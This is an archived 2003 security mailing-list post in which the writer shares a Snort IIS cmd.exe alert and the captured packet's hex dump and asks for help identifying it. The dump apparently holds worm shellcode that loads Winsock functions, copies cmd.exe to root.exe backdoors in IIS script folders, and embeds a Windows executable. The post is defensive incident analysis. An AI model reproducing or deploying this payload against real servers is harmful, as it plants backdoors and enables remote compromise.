strange cmd.exe access

From: Q (quentyn_at_the-q.co.uk)
Date: 05/29/03

  • Next message: Justin Pryzby: "Whois updates, Was: [Re: Possible Intrusion Attempt?]"
    Date: Thu, 29 May 2003 20:10:25 +0100 (BST)
    To: incidents@securityfocus.com
    
    

    Hi I saw this packet

    #(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access
    IPv4: 194.204.X.X -> X.X.X.X
          hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116
    chksum=60435
    TCP: port=27761 -> dport: 80 flags=***A**** seq=915915841
          ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
    Payload: length = 1432

    000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
    010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
    020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close
    030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E.
    040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u.
    050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri
    060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E.....
    070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U..
    080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem
    090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
    0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
    0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
    0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
    0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
    0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
    0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
    100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
    110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
    120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
    130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
    140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
    150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
    160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
    170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
    180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
    190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
    1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
    1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
    1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
    1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
    1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
    1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t.....
    200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
    210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
    220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
    230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
    240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
    250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t...
    260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
    270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
    280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
    290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
    2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
    2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
    2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
    2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
    2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
    2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
    300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
    310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
    320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
    330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
    340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
    350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
    360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
    370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................
    380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@.......
    390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ...
    3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
    3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0.......
    3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................
    3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................
    3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`......
    400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........
    410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
    420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0
    430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................
    440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@.........
    450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
    460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
    470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................
    480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @.
    490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @.
    4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L...
    4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1....
    4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h.
    4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u&
    4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @.
    4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@
    500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?...
    510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........
    520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L....
    530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @.
    540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@..
    550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h
    560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@.......
    570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@
    580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h
    590 : D4 24 40 00 6A 00 55 FF .$@.j.U.

    what is strange is that the cmd.exe / root.exe stuff is half way through
    with some other code before it

    the ip it hit was not mapped to anything ( I believe it is unused) so this
    can not have been part of another tcp converstion

    any ideas ?

    --
    The should be a sig here, but it got bored and wandered off 
    ----------------------------------------------------------------------------
    ----------------------------------------------------------------------------
    

  • Next message: Justin Pryzby: "Whois updates, Was: [Re: Possible Intrusion Attempt?]"

    Relevant Pages

    • Re: Patsy Ramseys 911 call
      ... Bo Raxo wrote: ... and then read the sig from the note. ... Not strange at all, if ... who took her I would have looked at the SIGline!, ...
      (alt.true-crime)
    • Re: For loops help
      ... i just can speak a little englise. ... Your sig didn't show that time, ... *is* a strange place, after all. ...
      (comp.lang.c)
    • Re: Warning: VOZ built sysadmins, lusers
      ... On 27 Dec 2011 22:40:22 GMT, Joe Zeff wrote: ... statements in science was, "That's strange, it wasn't supposed to do ... I've got a sig that I think is unattributed that says ...
      (alt.sysadmin.recovery)
    • Re: HbA1c
      ... or lack of it - in their sig. ... That'd be a pain though, having to change my sig for every email or ... newsgroup or whatever. ... Maybe I'm strange (OK, I *know* I'm strange, but I'm old enough now that I ...
      (alt.support.diabetes)
    • Re: [patch 2/5] signalfd v2 - signalfd core ...
      ... This mimics the LEGACY_QUEUEcheck, ... be pending in ctx->pending just because it was not signalfd_fetchsiged, ... if (sig_ignored(t, sig)) ... It is strange that we are doing signalfd_notifyeven if the signal is ignored. ...
      (Linux-Kernel)